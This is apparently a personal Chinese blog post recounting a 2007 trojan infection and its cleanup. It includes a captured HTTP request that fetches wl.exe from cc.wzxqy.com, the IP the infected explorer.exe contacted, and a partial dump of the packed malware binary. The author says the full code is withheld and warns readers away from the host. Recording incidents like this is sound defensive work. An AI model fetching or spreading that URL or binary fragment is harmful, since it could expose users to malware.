毒·毒·毒

运行近两年的机器，终于在我的折腾下...挂了，很严重，只能重装系统。两年，也经历过不少次病毒，包括威金和那个大名鼎鼎的烧香(熊猫烧香)。万万没想到的是，为此打算是给系统加个套套—Outpost Firewall Pro，但装完却被Symantec AntiVirus认为有问题，删除了某个系统级的dll，导致系统...唉，我咋这么背捏！

花了半天时间把系统装好了，为了给机器装Nero，不得已用IE去某个网站下载，谁知，我的笔记本也被告知中了木马Trojan-Dropper.Win32.Delf , NND，老子!#$%^&，可恶的病毒幸好还没来的急大规模发作就及时地被SAV查出及时给删除了。幸好我前一阵子升级了最新的SAV和病毒库，能够及时发现严重的病毒。但系统已经被植入木马，已经写到%windows%和注册表中，并且木马还在不停的下载其他木马和病毒程序。只是一些木马?却没有被它发现删除。

系统处在感染阶段，尚未发作，不停的报警提示木马被删除，却丝毫没有减少的迹象。立刻警觉起来，打开任务管理器，好家伙那些拙劣的名称:iexpl0er.exe, iep1oer.exe, system.exe(此名不太容易让人察觉), my.exe，赶紧kill掉。一边网上搜索相关信息，一边删除残留木马、病毒程序，忙得是不亦乐乎……，总算是清静了。然后断网又彻底清扫了一遍系统目录，又发现了以前残留的木马(汗，太马虎了，万幸的是它没发作)，再删除了注册表中的“残留物”。打开TcpView观察网络，发现explorer.exe总是隔几秒就访问59.63.157.84，于是tcpdump发现explorer.exe还在试图下载wl.exe，俄得神啊，对照网上的病毒分析说明，原来explorer.exe被感染了！虽然木马已经被删除了，但是有部分一定被植入到explorer.exe里！于是毫不犹豫地结束进程，这才算是彻底的杀干净。如果不是我多个心眼观察网络状况的话，那后果……

来看看病毒啥样子吧！

GET /33/wl.exe HTTP/1.1

User-Agent: Ms

Host: cc.wzxqy.com

Cache-Control: no-cache

Cookie: cck_lasttime=1169953580806; cck_count=0; ASPSESSIONIDSCTBCSRA=BGEGMBOBNADNGAINEDDOBKCO

HTTP/1.1 200 OK

Content-Length: 20992

Content-Type: application/octet-stream

Last-Modified: Thu, 25 Jan 2007 11:03:16 GMT

Accept-Ranges: bytes

ETag: "e69a276a7040c71:96e"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sun, 28 Jan 2007 04:52:18 GMT

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

$..............U...U...U...U...U4..U...U_..U...U4..U...U...U...U_..U...URich...U................PE..L....$.E.................P..UPX0@UPX1.....P...PUPX2.................P1.20.UPX!.....+.e.*..[u...I...`..&........WXYZ921306....5478FGHIJKLMABCDENOPQRSTUV,b..'.cdefghi8qrstuvwxyz6jk....lmnopa'PendingFileR
ameOn...perations.SYMEM\Curr.tC.
...trolSet\
\.ss)..m. Ma9g6O\explo/..s.r..e."DebugPrivb.o.k$##32770.RavM=....(Softwa7\MicZs
\.v..W.dows.VSl\Rm...unCAVP.Toduct_No.f.._.6._.............+A|rtDia.g.MgSyl.dl.n..l.L. .wt..o."0.....@.L.{.-.( ... H...... ..............;.... ..@..... ..........g&7k...'..xr.'.+S.+.....QY..c.
PX..U......E..e..........h$..E....1.@...................P....u.....I....@.w....L....Ej...Xz..@y.Xs.1..4...t{..nH.C.lh.. Vw.....G....%....f.g......_....f..._^....T.a.....V..u......3.^.....t,
.Q
....<X......`._....j...td..Gb......d.k..gni..k.{.../4..'..i......j.8.._.f....x.G......p{05.}.'.........A..O....G8..$.\...._...A8...@.E...1.2$=.%'.Ae+.. .L......}...T....G............r-....7...s+...GIu..............B%.X/p.|.;m.._)$t(.4v....Y.H..o..|.ou...-.}...:...T...d.........d...y.hW....Q"R.9Q.D..Z...Q..<.......aK.C..k.Y[......VC20XC00A..m......w.@.....L.
.(.C_...reateToolhelp32SnapshotWait....ForS.leObjec.T}...h/d&Nex
Firs.j....n<n[.jc..S4epMPm..DUe_.A.n.dl5
Lo.Librn...ary.Wri'
G1Sy.^..PemDWuo..CommK.~.an3nLEx0m..n...R.umi.a..W1-I.,.>._.opy.Term&.[..[qM.l.....Nam%.tr.Typ...-.RtlUnwd.W.C..f.MJ.
6M.o.oUtiByx.deCh.Y.6{.....$.7aqd.L.......l ..."..]..Ti.loseHGj..
.S.&LTal
6;a.jFI....m.ck6u...G...mgUKey..+.+..s{Adju..p..ck..s.6....upVuu.\,.0B2N......O.Q
..p.
'En.B..f..t.......;.Xag&P.
tt....u............u..........u KERNEL32.DLL.ADVAPI32.dll.USER32.dll.WINMM.dll..LoadLibraryA..GetProcAddress..ExitProcess...RegCloseKey...GetWindow...mixerOpen

注：此处没有贴出完成病毒码，看客们请放心！

cc.wzxqy.com为被感染的网站，或者病毒来源之一，请不要尝试打开！

Last-Modified: Thu, 25 Jan 2007 11:03:16 GMT  — 是不是新的变种，无法考证!